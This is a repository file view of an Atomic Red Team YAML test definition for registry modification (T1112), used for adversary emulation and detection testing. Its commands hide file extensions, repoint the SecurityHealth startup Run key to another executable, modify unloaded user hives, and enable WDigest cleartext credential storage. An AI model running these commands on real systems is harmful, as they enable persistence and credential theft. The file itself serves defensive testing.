security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1112/T1112.yaml
T
JB dd95258d4a T1112 atomic 4 name clarification (#574) 
Details: After further thought & discussion; suggesting a more precise name for atomic 4 (originally pulled here by me).  Changing to "Modify registry to store logon credentials," and removing the former word "downgrade."  The registry modification in this test does not actually enable a "downgrade," rather it allows the storage of auto-login credentials overall; they are resultingly stored as text, but that is not a downgrade

Testing: no testing required (only name change)

Associated Issues: none
2019-09-21 09:19:34 -06:00

103 lines
4.4 KiB
YAML
Raw Blame History

---
attack_technique: T1112
display_name: Modify Registry
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
description: |
Modify the registry of the currently logged in user using reg.exe cia cmd console
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
- name: Modify Registry of Local Machine - cmd
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
- name: Modify Registry of Another User Profile
description: |
Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
# Get Username, SID, and location of ntuser.dat for all users
$ProfileList = @()
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
Select @{ name = "SID"; expression = { $_.PSChildName } },
@{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
@{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }
# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }
$SIDObject = @()
foreach ($item in $LoadedHives)
{
$props = @{
SID = $item.SID
}
$TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
$SIDObject += $TempSIDObject
}
# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
# if the count is less than 2 it doesn't work. :)
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
{
for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
{
if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
{
$UnloadedHives += $ProfileList[$p].SID
Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"
Write-Verbose -Message 'Attempting to modify registry keys for each profile'
#####################################################################
reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
}
}
}
Write-Verbose 'Unloading Registry hives for all users'
# Unload ntuser.dat
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"
- name: Modify registry to store logon credentials
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
cleanup_command: |
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
Reference in New Issue View Git Blame Copy Permalink